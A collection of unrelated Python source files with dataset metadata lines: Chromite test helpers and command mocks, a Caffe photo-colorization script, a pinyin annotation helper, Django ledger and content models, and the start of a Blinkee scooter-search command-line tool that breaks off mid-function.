'-S', os.path.join(self._mysqld_dir, 'mysqld.socket'),
'-u', 'root',
'shutdown',
]
cros_build_lib.run(cmd, quiet=True)
except cros_build_lib.RunCommandError as e:
self._CleanupMysqld(
failure='mysqladmin failed to shutdown mysqld: %s' % e)
else:
self._CleanupMysqld()
def _CleanupMysqld(self, failure=None):
if self._mysqld_runner is None:
return
try:
if failure is not None:
self._mysqld_runner.__exit__(
Exception,
'%s. We force killed the mysqld process.' % failure,
None,
)
else:
self._mysqld_runner.__exit__(None, None, None)
finally:
self._mysqld_runner = None
class FakeSDKCache(object):
"""Creates a fake SDK Cache."""
def __init__(self, cache_dir, sdk_version='12225.0.0'):
"""Creates a fake SDK Cache.
Args:
cache_dir: The top level cache directory to use.
sdk_version: The SDK Version.
"""
self.cache_dir = cache_dir
# Sets the SDK Version.
self.sdk_version = sdk_version
os.environ['%SDK_VERSION'] = sdk_version
# Defines the path for the fake SDK Symlink Cache. (No backing tarball cache
# is needed.)
self.symlink_cache_path = os.path.join(self.cache_dir, 'chrome-sdk',
'symlinks')
# Creates an SDK SymlinkCache instance.
self.symlink_cache = cache.DiskCache(self.symlink_cache_path)
def CreateCacheReference(self, board, key):
"""Creates the Cache Reference.
Args:
board: The board to use.
key: The key of the item in the tarball cache.
Returns:
Path to the cache directory.
"""
# Adds the cache path at the key.
return self.symlink_cache.Lookup((board, self.sdk_version, key)).path
class MockTestCase(TestCase):
"""Python-mock based test case; compatible with StackedSetup"""
def setUp(self):
self._patchers = []
def tearDown(self):
# We can't just run stopall() by itself, and need to stop our patchers
# manually since stopall() doesn't handle repatching.
cros_build_lib.SafeRun([p.stop for p in reversed(self._patchers)] +
[mock.patch.stopall])
def StartPatcher(self, patcher):
"""Call start() on the patcher, and stop() in tearDown."""
m = patcher.start()
self._patchers.append(patcher)
return m
def PatchObject(self, *args, **kwargs):
"""Create and start a mock.patch.object().
stop() will be called automatically during tearDown.
"""
return self.StartPatcher(mock.patch.object(*args, **kwargs))
def PatchDict(self, *args, **kwargs):
"""Create and start a mock.patch.dict().
stop() will be called automatically during tearDown.
"""
return self.StartPatcher(mock.patch.dict(*args, **kwargs))
# MockTestCase must be before TempDirTestCase in this inheritance order,
# because MockTestCase.StartPatcher() calls may be for PartialMocks, which
# create their own temporary directory. The teardown for those directories
# occurs during MockTestCase.tearDown(), which needs to be run before
# TempDirTestCase.tearDown().
class MockTempDirTestCase(MockTestCase, TempDirTestCase):
"""Convenience class mixing TempDir and Mock."""
class MockOutputTestCase(MockTestCase, OutputTestCase):
"""Convenience class mixing Output and Mock."""
class ProgressBarTestCase(MockOutputTestCase):
"""Test class to test the progress bar."""
# pylint: disable=protected-access
def setUp(self):
self._terminal_size = self.PatchObject(
operation.ProgressBarOperation, '_GetTerminalSize',
return_value=operation._TerminalSize(100, 20))
self.PatchObject(os, 'isatty', return_value=True)
def SetMockTerminalSize(self, width, height):
"""Set mock terminal's size."""
self._terminal_size.return_value = operation._TerminalSize(width, height)
def AssertProgressBarAllEvents(self, num_events):
"""Check that the progress bar generates expected events."""
skipped = 0
for i in range(num_events):
try:
self.AssertOutputContainsLine('%d%%' % (i * 100 // num_events))
except AssertionError:
skipped += 1
# crbug.com/560953 It's normal to skip a few events under heavy CPU load.
self.assertLessEqual(skipped, num_events // 2,
'Skipped %s of %s progress updates' %
(skipped, num_events))
self.AssertOutputContainsLine('100%')
class MockLoggingTestCase(MockTestCase, LoggingTestCase):
"""Convenience class mixing Logging and Mock."""
@contextlib.contextmanager
def SetTimeZone(tz):
"""Temporarily set the timezone to the specified value.
This is needed because cros_test_lib.TestCase doesn't call time.tzset()
after resetting the environment.
"""
old_environ = os.environ.copy()
try:
os.environ['TZ'] = tz
time.tzset()
yield
finally:
osutils.SetEnvironment(old_environ)
time.tzset()
class ListTestSuite(unittest.BaseTestSuite):
"""Stub test suite to list all possible tests"""
# We hack in |top| for local recursive usage.
# pylint: disable=arguments-differ
def run(self, result, _debug=False, top=True):
"""List all the tests this suite would have run."""
# Recursively build a list of all the tests and the descriptions.
# We do this so we can align the output when printing.
tests = []
# Walk all the tests that this suite itself holds.
for test in self:
if isinstance(test, type(self)):
tests += test(result, top=False)
else:
desc = test.shortDescription()
if desc is None:
desc = ''
tests.append((test.id(), desc))
if top:
if tests:
# Now that we have all the tests, print them in lined up columns.
maxlen = max(len(x[0]) for x in tests)
for test, desc in tests:
print('%-*s %s' % (maxlen, test, desc))
return result
else:
return tests
class ListTestLoader(unittest.TestLoader):
"""Stub test loader to list all possible tests"""
suiteClass = ListTestSuite
class ListTestRunner(object):
"""Stub test runner to list all possible tests"""
def run(self, test):
result = unittest.TestResult()
test(result)
return result
class TraceTestRunner(unittest.TextTestRunner):
"""Test runner that traces the test code as it runs
We insert tracing at the test runner level rather than test suite or test
case because both of those can execute code we've written (e.g. setUpClass
and setUp), and we want to trace that code too.
"""
TRACE_KWARGS = {}
def run(self, test):
import trace
tracer = trace.Trace(**self.TRACE_KWARGS)
return tracer.runfunc(unittest.TextTestRunner.run, self, test)
class ProfileTestRunner(unittest.TextTestRunner):
"""Test runner that profiles the test code as it runs
We insert profiling at the test runner level rather than test suite or test
case because both of those can execute code we've written (e.g. setUpClass
and setUp), and we want to profile that code too. It might be unexpectedly
heavy by invoking expensive setup logic.
"""
PROFILE_KWARGS = {}
SORT_STATS_KEYS = ()
def run(self, test):
import cProfile
profiler = cProfile.Profile(**self.PROFILE_KWARGS)
ret = profiler.runcall(unittest.TextTestRunner.run, self, test)
import pstats
stats = pstats.Stats(profiler, stream=sys.stderr)
stats.strip_dirs().sort_stats(*self.SORT_STATS_KEYS).print_stats()
return ret
class TestProgram(unittest.TestProgram):
"""Helper wrapper around unittest.TestProgram
Any passed in kwargs are passed directly down to unittest.main; via this, you
can inject custom argv for example (to limit what tests run).
"""
def __init__(self, **kwargs):
self.default_log_level = kwargs.pop('level', 'critical')
self._leaked_tempdir = None
try:
super(TestProgram, self).__init__(**kwargs)
finally:
if GlobalTestConfig.NETWORK_TESTS_SKIPPED:
print('Note: %i network test(s) skipped; use --network to run them.' %
GlobalTestConfig.NETWORK_TESTS_SKIPPED)
def parseArgs(self, argv):
"""Parse the command line for the test"""
description = """Examples:
%(prog)s - run default set of tests
%(prog)s MyTestSuite - run suite MyTestSuite
%(prog)s MyTestCase.testSomething - run MyTestCase.testSomething
%(prog)s MyTestCase - run all MyTestCase.test* methods
"""
parser = commandline.ArgumentParser(
description=description, default_log_level=self.default_log_level)
# These are options the standard unittest.TestProgram supports.
parser.add_argument('-q', '--quiet', default=False, action='store_true',
help='Minimal output')
parser.add_argument('-f', '--failfast', default=False, action='store_true',
help='Stop on first failure')
parser.add_argument('tests', nargs='*',
help='specific test classes or methods to run')
parser.add_argument('-c', '--catch', default=False, action='store_true',
help='Catch control-C and display results')
parser.add_argument('-b', '--buffer', default=False, action='store_true',
help='Buffer stdout and stderr during test runs')
# These are custom options we added.
parser.add_argument('-l', '--list', default=False, action='store_true',
help='List all the available tests')
parser.add_argument('--network', default=False, action='store_true',
help='Run tests that depend on good network '
'connectivity')
parser.add_argument('--no-wipe', default=True, action='store_false',
dest='wipe',
help='Do not wipe the temporary working directory '
'(default is to always wipe)')
parser.add_argument('-u', '--update', default=False, action='store_true',
help='Update generated test files as needed.')
# Note: The tracer module includes coverage options ...
group = parser.add_argument_group('Tracing options')
group.add_argument('--trace', default=False, action='store_true',
help='Trace test execution')
group.add_argument('--ignore-module', default='',
help='Ignore the specified modules (comma delimited)')
group.add_argument('--ignore-dir', default='',
help='Ignore modules/packages in the specified dirs '
'(comma delimited)')
group.add_argument('--no-ignore-system', default=True, action='store_false',
dest='ignore_system',
help='Do not ignore sys paths automatically')
group = parser.add_argument_group('Profiling options')
group.add_argument('--profile', default=False, action='store_true',
help='Profile test execution')
group.add_argument('--profile-sort-keys', default='time',
help='Keys to sort stats by (comma delimited)')
group.add_argument('--no-profile-builtins', default=True,
action='store_false', dest='profile_builtins',
help='Do not profile builtin functions')
opts = parser.parse_args(argv[1:])
opts.Freeze()
# Process the common options first.
if opts.verbose:
self.verbosity = 2
if opts.quiet:
self.verbosity = 0
if opts.failfast:
self.failfast = True
if opts.catch:
self.catchbreak = True
if opts.buffer:
self.buffer = True
# Then handle the chromite extensions.
if opts.network:
GlobalTestConfig.RUN_NETWORK_TESTS = True
if opts.update:
GlobalTestConfig.UPDATE_GENERATED_FILES = True
# We allow --list because it's nice to be able to throw --list onto an
# existing command line to quickly get the output. It's clear to users
# that it does nothing else.
if sum((opts.trace, opts.profile)) > 1:
parser.error('--trace/--profile are exclusive')
if opts.list:
self.testRunner = ListTestRunner
self.testLoader = ListTestLoader()
elif opts.trace:
self.testRunner = TraceTestRunner
# Create the automatic ignore list based on sys.path. We need to filter
# out chromite paths though as we might have automatic local paths in it.
auto_ignore = set()
if opts.ignore_system:
auto_ignore.add(os.path.join(constants.CHROMITE_DIR, 'third_party'))
for path in sys.path:
path = os.path.realpath(path)
if path.startswith(constants.CHROMITE_DIR):
continue
auto_ignore.add(path)
TraceTestRunner.TRACE_KWARGS = {
# Disable counting as it only applies to coverage collection.
'count': False,
# Enable tracing support since that's what we want w/--trace.
'trace': True,
# Enable relative timestamps before each traced line.
'timing': True,
'ignoremods': opts.ignore_module.split(','),
'ignoredirs': set(opts.ignore_dir.split(',')) | auto_ignore,
}
elif opts.profile:
self.testRunner = ProfileTestRunner
ProfileTestRunner.PROFILE_KWARGS = {
'subcalls': True,
'builtins': opts.profile_builtins,
}
ProfileTestRunner.SORT_STATS_KEYS = opts.profile_sort_keys.split(',')
# Figure out which tests the user/unittest wants to run.
if not opts.tests and self.defaultTest is None:
self.testNames = None
elif opts.tests:
self.testNames = opts.tests
else:
self.testNames = (self.defaultTest,)
if not opts.wipe:
# Instruct the TempDirTestCase to skip cleanup before actually creating
# any tempdirs.
self._leaked_tempdir = TempDirTestCase.SkipCleanup()
self.createTests()
def runTests(self):
# If cidb has been imported, stub it out. We do this dynamically so we
# don't have to import cidb in every single test module.
if 'chromite.lib.cidb' in sys.modules:
# Unit tests should never connect to the live prod or debug instances
# of the cidb. This call ensures that they will not accidentally
# do so through the normal cidb SetUp / GetConnectionForBuilder factory.
sys.modules['chromite.lib.cidb'].CIDBConnectionFactory.SetupMockCidb()
try:
super(TestProgram, self).runTests()
finally:
if self._leaked_tempdir is not None:
logging.info('Working directory %s left behind. Please cleanup later.',
self._leaked_tempdir)
class PopenMock(partial_mock.PartialCmdMock):
"""Provides a context where all _Popen instances are low-level mocked."""
TARGET = 'chromite.lib.cros_build_lib._Popen'
ATTRS = ('__init__',)
DEFAULT_ATTR = '__init__'
def __init__(self):
partial_mock.PartialCmdMock.__init__(self, create_tempdir=True)
def _target__init__(self, inst, cmd, *args, **kwargs):
result = self._results['__init__'].LookupResult(
(cmd,), hook_args=(inst, cmd,) + args, hook_kwargs=kwargs)
script = os.path.join(self.tempdir, 'mock_cmd.sh')
stdout = os.path.join(self.tempdir, 'output')
stderr = os.path.join(self.tempdir, 'error')
# This encoding handling might appear a bit wonky, but it's OK, I promise.
# The purpose of this mock is to stuff data into files so that we can run a
# fake script in place of the real command. So any cros_build_lib.run()
# settings will still be fully checked including encoding. This code just
# takes care of writing the data from AddCmdResult objects. Those might be
# specified in strings or in bytes, but there's no value in forcing all code
# to use the same encoding with the mocks.
def _MaybeEncode(src):
return src.encode('utf-8') if isinstance(src, six.text_type) else src
osutils.WriteFile(stdout, _MaybeEncode(result.output), mode='wb')
osutils.WriteFile(stderr, _MaybeEncode(result.error), mode='wb')
osutils.WriteFile(
script,
['#!/bin/bash\n', 'cat %s\n' % stdout, 'cat %s >&2\n' % stderr,
'exit %s' % result.returncode])
os.chmod(script, 0o700)
kwargs['cwd'] = self.tempdir
self.backup['__init__'](inst, [script, '--'] + cmd, *args, **kwargs)
class RunCommandMock(partial_mock.PartialCmdMock):
"""Provides a context where all run invocations low-level mocked."""
TARGET = 'chromite.lib.cros_build_lib'
ATTRS = ('run',)
DEFAULT_ATTR = 'run'
def run(self, cmd, *args, **kwargs):
result = self._results['run'].LookupResult(
(cmd,), kwargs=kwargs, hook_args=(cmd,) + args, hook_kwargs=kwargs)
popen_mock = PopenMock()
popen_mock.AddCmdResult(partial_mock.Ignore(), result.returncode,
result.output, result.error)
with popen_mock:
return self.backup['run'](cmd, *args, **kwargs)
# Backwards compat API.
RunCommand = run
class RunCommandTestCase(MockTestCase):
"""MockTestCase that mocks out run by default."""
def setUp(self):
self.rc = self.StartPatcher(RunCommandMock())
self.rc.SetDefaultCmdResult()
self.assertCommandCalled = self.rc.assertCommandCalled
self.assertCommandContains = self.rc.assertCommandContains
# These ENV variables affect run behavior, hide them.
self._old_envs = {e: os.environ.pop(e) for e in constants.ENV_PASSTHRU
if e in os.environ}
def tearDown(self):
# Restore hidden ENVs.
if hasattr(self, '_old_envs'):
os.environ.update(self._old_envs)
class RunCommandTempDirTestCase(RunCommandTestCase, TempDirTestCase):
"""Convenience class mixing TempDirTestCase and RunCommandTestCase"""
class main(TestProgram):
"""Chromite's version of unittest.main. Invoke this, not unittest.main."""
| 1.90625 | 2 |
colorize.py | sergekatzmann/batch_colorize | 2 | 12766769 | <gh_stars>1-10
#!/usr/bin/python
import os
os.environ['GLOG_minloglevel'] = '2'
import time
import numpy as np
import caffe
import skimage.color as color
import scipy
import scipy.ndimage.interpolation as sni
from os import listdir
from os.path import isfile, join
import sys, getopt
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def colorizeFile(input, output):
caffemodel = 'colorization_release_v0.caffemodel'
prototxt = 'colorization_deploy_v0.prototxt'
net = caffe.Net(prototxt, caffemodel, caffe.TEST)
(H_in, W_in) = net.blobs['data_l'].data.shape[2:] # get input shape
(H_out, W_out) = net.blobs['class8_ab'].data.shape[2:] # get output shape
net.blobs['Trecip'].data[...] = 6 / np.log(10) # 1/T, set annealing temperature
# (We found that we had introduced a factor of log(10). We will update the arXiv shortly.)
# load the original image
img_rgb = caffe.io.load_image(input)
img_lab = color.rgb2lab(img_rgb) # convert image to lab color space
img_l = img_lab[:, :, 0] # pull out L channel
(H_orig, W_orig) = img_rgb.shape[:2] # original image size
# resize image to network input size
img_rs = caffe.io.resize_image(img_rgb, (H_in, W_in)) # resize image to network input size
img_lab_rs = color.rgb2lab(img_rs)
img_l_rs = img_lab_rs[:, :, 0]
net.blobs['data_l'].data[0, 0, :, :] = img_l_rs - 50 # subtract 50 for mean-centering
net.forward() # run network
ab_dec = net.blobs['class8_ab'].data[0, :, :, :].transpose((1, 2, 0)) # this is our result
ab_dec_us = sni.zoom(ab_dec,
(1. * H_orig / H_out, 1. * W_orig / W_out, 1)) # upsample to match size of original image L
img_lab_out = np.concatenate((img_l[:, :, np.newaxis], ab_dec_us), axis=2) # concatenate with original image L
img_rgb_out = np.clip(color.lab2rgb(img_lab_out), 0, 1) # convert back to rgb
scipy.misc.imsave(output, img_rgb_out)
return;
def colorizeDir(inputDir, outputDir):
imagefiles = [f for f in listdir(inputDir) if isfile(join(inputDir, f))]
for image in imagefiles:
if image == '.gitkeep':
continue
(imageName, imageExt) = os.path.splitext(os.path.basename(image))
input = inputDir + image
output = outputDir + imageName + '_color' + imageExt
print "Processing file:"
print "input =" + input
print "output =" + output
start = time.time()
colorizeFile(input, output)
end = time.time()
print "Duration: %.0f" % (end - start)
def printColor(message, color):
print color + message + bcolors.ENDC
def printGreen(message):
printColor(message, bcolors.OKGREEN)
def printError(message):
printColor(message, bcolors.FAIL)
def usage():
printGreen('Usage:')
printGreen('colorize.py -i <inputdirectory> -o <outputdirectory>')
return;
def main(argv):
inputDir = ''
outputDir = ''
try:
opts, args = getopt.getopt(argv, "hi:o:", ["idir=", "odir="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
elif opt in ("-i", "--idir"):
inputDir = arg
elif opt in ("-o", "--odir"):
outputDir = arg
if (inputDir == '' or outputDir == ''):
usage()
sys.exit(2)
if(not os.path.isdir(inputDir)):
printError ('Can not locate input directory "' + inputDir + '"')
sys.exit(3)
if(not os.path.isdir(outputDir)):
printError('Can not locate output directory "' + outputDir + '"')
sys.exit(3)
if(not os.access(outputDir, os.R_OK)):
printError('The input directory "' + outputDir + '" is not readable')
sys.exit(4)
if(not os.access(outputDir, os.W_OK)):
printError('The output directory "' + outputDir + '" is not writeable')
sys.exit(4)
colorizeDir(inputDir,outputDir)
return;
if __name__ == "__main__":
main(sys.argv[1:])
| 1.992188 | 2 |
src/pinyiniser/main.py | mldelaney94/pinyiniser | 0 | 12766770 | <filename>src/pinyiniser/main.py
import jieba
import pinyiniser
import os
from pathlib import Path
curr_dir = '\\'.join(pinyiniser.__file__.split('\\')[0:-1])
numeric_dict = os.path.join(curr_dir, Path('./data/cedict_ts_no_space_numerals.u8'))
diacritic_dict = os.path.join(curr_dir, Path('./data/cedict_ts_pinyin.u8'))
do_not_parse_set = {
#Chinese special chars
'?', ',', '!', '。', ';', '“', '”', ':', '–', '—', '*',
'…', '、', '~', '-', '(', ')', '─', '<', '>', '.', '《', '》',
'%', '·', '’', '‘', '……', '【', '】',
#Standard special chars
'`', '~', '!', '@', '#', '^', '&', '*', '(', ')', '-', '_',
'[', ']', '{', '}', '\\', '|', ';', ':', '\'', '"', ',', '<', '.',
'>', '/', '?',
#Maths
'=', '+', '-', '/', '%',
#Currency chars
'$', '¥', '£', '€'
}
def write_lines(lines, path):
with open(path, 'w+') as f:
i = 1
for line in lines:
f.write('Line ' + str(i) + ':\n')
f.write(line)
i += 1
f.write('Line ' + str(i) + ':\n')
def read_lines(path):
with open(path, 'r') as f:
lines = []
string_to_add = ''
first = True
for line in f.readlines():
if 'Line' in line:
if first:
first = False
continue
lines.append(string_to_add)
string_to_add = ''
else:
string_to_add += line
return lines
def add_pinyin(zh_string, zh_dict, special={},
do_not_parse=do_not_parse_set):
if zh_string in special:
return zh_string + '\n' + special[zh_string] + '\n'
pinyin = get_pinyin(zh_string, zh_dict, do_not_parse)
zh_string += '\n'
first = True
for item in pinyin:
if item in do_not_parse or first:
zh_string += item
first = False
else:
zh_string += ' ' + item
return zh_string + '\n'
def get_pinyin(zh_string, zh_dict, do_not_parse=do_not_parse_set):
line_segs = tuple(jieba.cut(zh_string, cut_all=False))
pinyin = []
for word in line_segs:
if word in zh_dict:
pinyin.append(zh_dict[word]['pinyin'])
else:
if word in do_not_parse or ord(word[0]) < 255:
pinyin.append(word)
else:
for character in word:
if character in zh_dict:
pinyin.append(zh_dict[character]['pinyin'])
else:
pinyin.append(character)
return pinyin
def get_dictionary(numeric=False):
if numeric == True:
return parse_dict(numeric_dict)
return parse_dict(diacritic_dict)
def parse_dict(path):
return cc_cedict_parser.parse_dict(path)
if __name__ == '__main__':
from data import cc_cedict_parser
print(diacritic_dict)
else:
from .data import cc_cedict_parser
| 3.09375 | 3 |
test.py | yuvraj9/key-value-store | 2 | 12766771 | from tests.cli import commands
from click.testing import CliRunner
def test_get_not_found():
"""
Executes the kv get <key> command. The key does not exist yet so it
returns the Key Doesn't exist message and status_code. It validates
the output.
"""
runner = CliRunner()
result = runner.invoke(commands, ['get', 'lamsbda'])
expected_value = '{"status_code": 404, "error": "Key Doesn\'t exist"}\n\n'
assert result.exit_code == 0
assert result.output == expected_value
def test_put_value():
"""
Executes the kv put <key> <value> command. This puts the pair in the
key value store. Then we check the output as it should return a json
of the key-value pair.
"""
runner = CliRunner()
testPut = runner.invoke(commands, ['put', 'key1', 'value1'])
assert testPut.exit_code == 0
assert testPut.output == '{"key1": "value1"}\n\n'
def test_get_value():
"""
Executes kv get <key> command again but this time we check for the
key which we have added in above step. This validates the put
sub command as well.
"""
runner = CliRunner()
testGet = runner.invoke(commands, ['get', 'key1'])
assert testGet.exit_code == 0
assert testGet.output == '{"value": "value1"}\n\n'
| 2.90625 | 3 |
3DmFV-Net-master/models/voxnet_3dmfv.py | wangzihaoyt36/PointnetEnhanced | 0 | 12766772 | <reponame>wangzihaoyt36/PointnetEnhanced<filename>3DmFV-Net-master/models/voxnet_3dmfv.py
import tensorflow as tf
import numpy as np
import math
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, '../utils'))
import tf_util
from transform_nets import feature_transform_net
def placeholder_inputs(batch_size, n_points, gmm):
#Placeholders for the data
n_gaussians = gmm.means_.shape[0]
D = gmm.means_.shape[1]
labels_pl = tf.placeholder(tf.int32, shape=(batch_size))
w_pl = tf.placeholder(tf.float32, shape=(n_gaussians))
mu_pl = tf.placeholder(tf.float32, shape=(n_gaussians, D))
sigma_pl = tf.placeholder(tf.float32, shape=(n_gaussians, D)) # diagonal
points_pl = tf.placeholder(tf.float32, shape=(batch_size, n_points, D))
return points_pl, labels_pl, w_pl, mu_pl, sigma_pl
def get_model(points, w, mu, sigma, is_training, bn_decay=None, weigth_decay=0.005, add_noise=False, num_classes=40):
""" Classification PointNet, input is BxNx3, output Bx40 """
batch_size = points.get_shape()[0].value
n_points = points.get_shape()[1].value
n_gaussians = w.shape[0].value
res = int(np.round(np.power(n_gaussians,1.0/3.0)))
fv = tf_util.get_fv_minmax(points, w, mu, sigma, flatten=False)
if add_noise:
noise = tf.cond(is_training,
lambda: tf.random_normal(shape=tf.shape(fv), mean=0.0, stddev=0.01, dtype=tf.float32),
lambda: tf.zeros(shape=tf.shape(fv)))
#noise = tf.random_normal(shape=tf.shape(fv), mean=0.0, stddev=0.01, dtype=tf.float32)
fv = fv + noise
grid_fisher = tf.reshape(fv, [batch_size, -1, res, res, res])
grid_fisher = tf.transpose(grid_fisher, [0, 2, 3, 4, 1])
#3D Voxenet with pfv
layer = 1
net = tf_util.conv3d(grid_fisher, 32, [5, 5, 5], scope='conv'+str(layer),
stride=[2, 2, 2], padding='SAME', bn=True,
bn_decay=bn_decay, is_training=is_training)
layer = layer + 1
net = tf_util.conv3d(net, 32, [3, 3, 3], scope='conv'+str(layer),
stride=[1, 1, 1], padding='SAME', bn=True,
bn_decay=bn_decay, is_training=is_training)
layer = layer + 1
net = tf_util.max_pool3d(net, [2, 2, 2], scope='maxpool'+str(layer), stride=[2, 2, 2], padding='SAME')
net = tf.reshape(net,[batch_size, -1])
#Classifier
net = tf_util.fully_connected(net, 128, bn=True, is_training=is_training,
scope='fc1', bn_decay=bn_decay, weigth_decay=weigth_decay)
net = tf_util.dropout(net, keep_prob=0.7, is_training=is_training,
scope='dp1')
net = tf_util.fully_connected(net, num_classes, activation_fn=None, scope='fc4', is_training=is_training, weigth_decay=weigth_decay)
return net, fv
def inception_module(input, n_filters=64, kernel_sizes=[3,5], is_training=None, bn_decay=None, scope='inception'):
one_by_one = tf_util.conv3d(input, n_filters, [1,1,1], scope= scope + '_conv1',
stride=[1, 1, 1], padding='SAME', bn=True,
bn_decay=bn_decay, is_training=is_training)
three_by_three = tf_util.conv3d(one_by_one, int(n_filters/2), [kernel_sizes[0], kernel_sizes[0], kernel_sizes[0]], scope= scope + '_conv2',
stride=[1, 1, 1], padding='SAME', bn=True,
bn_decay=bn_decay, is_training=is_training)
five_by_five = tf_util.conv3d(one_by_one, int(n_filters/2), [kernel_sizes[1], kernel_sizes[1], kernel_sizes[1]], scope=scope + '_conv3',
stride=[1, 1, 1], padding='SAME', bn=True,
bn_decay=bn_decay, is_training=is_training)
average_pooling = tf_util.avg_pool3d(input, [kernel_sizes[0], kernel_sizes[0], kernel_sizes[0]], scope=scope+'_avg_pool', stride=[1, 1, 1], padding='SAME')
average_pooling = tf_util.conv3d(average_pooling, n_filters, [1,1,1], scope= scope + '_conv4',
stride=[1, 1, 1], padding='SAME', bn=True,
bn_decay=bn_decay, is_training=is_training)
output = tf.concat([ one_by_one, three_by_three, five_by_five, average_pooling], axis=4)
#output = output + tf.tile(input) ??? #resnet
return output
def get_loss(pred, label):
""" pred: B*NUM_CLASSES,
label: B, """
weight_decay_losses = tf.get_collection('losses')
weight_decay_loss = tf.reduce_sum(weight_decay_losses)
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=pred, labels=label)
# loss = tf.losses.softmax_cross_entropy(logits=pred , onehot_labels=tf.one_hot(tf.to_int32(label),depth=40), label_smoothing=0.128)
classify_loss = tf.reduce_mean(loss)
tf.summary.scalar('classify loss', classify_loss)
tf.summary.scalar('weight_decay_loss', weight_decay_loss)
return classify_loss + weight_decay_loss
if __name__ == '__main__':
with tf.Graph().as_default():
inputs = tf.zeros((32, 1024, 3))
outputs = get_model(inputs, tf.constant(True))
print (outputs)
| 1.96875 | 2 |
app/wrapper/models.py | Sirius-social/TMTM | 0 | 12766773 | import os
import hashlib
import secrets
from django.db import models
from django.core.cache import cache
from django.db.models.signals import pre_save, pre_delete, post_migrate
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField, ArrayField
def import_class(name):
components = name.split('.')
mod = __import__(components[0])
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
class UserEntityBind(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='entities')
entity = models.CharField(max_length=64)
class Meta:
unique_together = ('entity', 'user')
class Ledger(models.Model):
entity = models.CharField(max_length=64, db_index=True, null=True)
name = models.CharField(max_length=512, db_index=True)
metadata = JSONField(null=True, default=None)
participants = ArrayField(models.CharField(max_length=128), null=True)
class Meta:
unique_together = ('entity', 'name')
class Transaction(models.Model):
ledger = models.ForeignKey(Ledger, on_delete=models.CASCADE)
txn = JSONField()
seq_no = models.IntegerField(null=True)
metadata = JSONField(null=True, default=None)
created = models.DateTimeField(auto_now_add=True, db_index=True, null=True)
actor_entity = models.CharField(max_length=64, db_index=True, null=True)
class Meta:
unique_together = ('seq_no', 'ledger')
class GURecord(models.Model):
entity = models.CharField(max_length=64, db_index=True)
category = models.CharField(max_length=36, db_index=True)
no = models.CharField(max_length=128)
date = models.CharField(max_length=128)
cargo_name = models.CharField(max_length=128)
depart_station = models.CharField(max_length=128)
arrival_station = models.CharField(max_length=128)
month = models.CharField(max_length=128)
year = models.CharField(max_length=128)
decade = models.CharField(max_length=128)
tonnage = models.CharField(max_length=128)
shipper = models.CharField(max_length=128)
attachments = JSONField()
class Content(models.Model):
STORAGE_FILE_SYSTEM = 'django.core.files.storage.FileSystemStorage'
SUPPORTED_STORAGE = [
(STORAGE_FILE_SYSTEM, 'FileSystemStorage'),
]
id = models.CharField(max_length=128, db_index=True)
uid = models.CharField(max_length=128, primary_key=True)
entity = models.CharField(max_length=1024, null=True, db_index=True)
name = models.CharField(max_length=512, db_index=True)
content_type = models.CharField(max_length=1024, null=True, db_index=True)
storage = models.CharField(max_length=256, db_index=True, choices=SUPPORTED_STORAGE, default=STORAGE_FILE_SYSTEM)
created = models.DateTimeField(null=True, auto_now_add=True)
updated = models.DateTimeField(null=True, auto_now=True)
is_avatar = models.BooleanField(default=False)
size_width = models.IntegerField(null=True)
size_height = models.IntegerField(null=True)
delete_after_download = models.BooleanField(default=False, db_index=True)
encoded = models.BooleanField(default=False, db_index=True)
download_counter = models.IntegerField(default=0, db_index=True)
md5 = models.CharField(max_length=128, null=True)
@property
def url(self):
return settings.MEDIA_URL + self.uid
def get_storage_instance(self):
cls = import_class(self.storage)
return cls()
def set_file(self, file):
self.name = file.name
self.content_type = file.content_type
_, ext = os.path.splitext(file.name.lower())
self.id = secrets.token_hex(16)
self.uid = self.id + ext
self.get_storage_instance().save(self.uid, file)
file.seek(0)
content = file.read()
self.md5 = hashlib.md5(content).hexdigest()
self.entity = settings.AGENT['entity']
pass
def delete(self, using=None, keep_parents=False):
try:
self.get_storage_instance().delete(self.uid)
except NotImplementedError:
pass
super().delete(using, keep_parents)
class Token(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
created = models.DateTimeField(auto_now_add=True)
value = models.CharField(max_length=128, db_index=True)
entity = models.CharField(max_length=1024, db_index=True)
@staticmethod
def allocate(user: User):
inst = Token.objects.create(
user=user,
value=secrets.token_hex(16),
entity=settings.AGENT['entity']
)
return inst
def clear_txn_caches(instance, *args, **kwargs):
cache.delete(settings.INBOX_CACHE_KEY)
cache.delete(settings.LEDGERS_CACHE_KEY)
pre_save.connect(clear_txn_caches, sender=Ledger)
pre_save.connect(clear_txn_caches, sender=Transaction)
pre_delete.connect(clear_txn_caches, sender=Ledger)
pre_delete.connect(clear_txn_caches, sender=Transaction)
post_migrate.connect(clear_txn_caches, sender=Ledger)
post_migrate.connect(clear_txn_caches, sender=Transaction)
| 1.992188 | 2 |
is_blinkee_nearby.py | terenaa/is-blinkee-nearby | 1 | 12766774 | <reponame>terenaa/is-blinkee-nearby
# -*- coding: utf-8 -*-
from Notifier import Discord
from Blinkee import Blinkee, BlinkeeApi
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
exclusive_group = parser.add_mutually_exclusive_group(required=True)
exclusive_group.add_argument("-s", "--search", action="store_true", help="search scooters nearby")
exclusive_group.add_argument("-a", "--regions", action="store_true", help="show available regions")
searching_group = parser.add_argument_group("Search scooters nearby")
searching_group.add_argument("-o", "--origin", help="starting point coordinates xx.xxx,yy.yyy")
searching_group.add_argument("-r", "--region", help="chosen region ID")
searching_group.add_argument("-d", "--distance", help="distance in meters")
parser.add_argument("-w", "--webhook", help="notifier webhook url", required=False)
args = parser.parse_args()
if args.regions:
regions = BlinkeeApi().get_regions()
if not regions:
print("No available regions.")
row_format = u"{:<5}" * 2
print("Available regions:\n")
print(row_format.format("ID", "Region"))
print(row_format.format("--", "------"))
for region in regions:
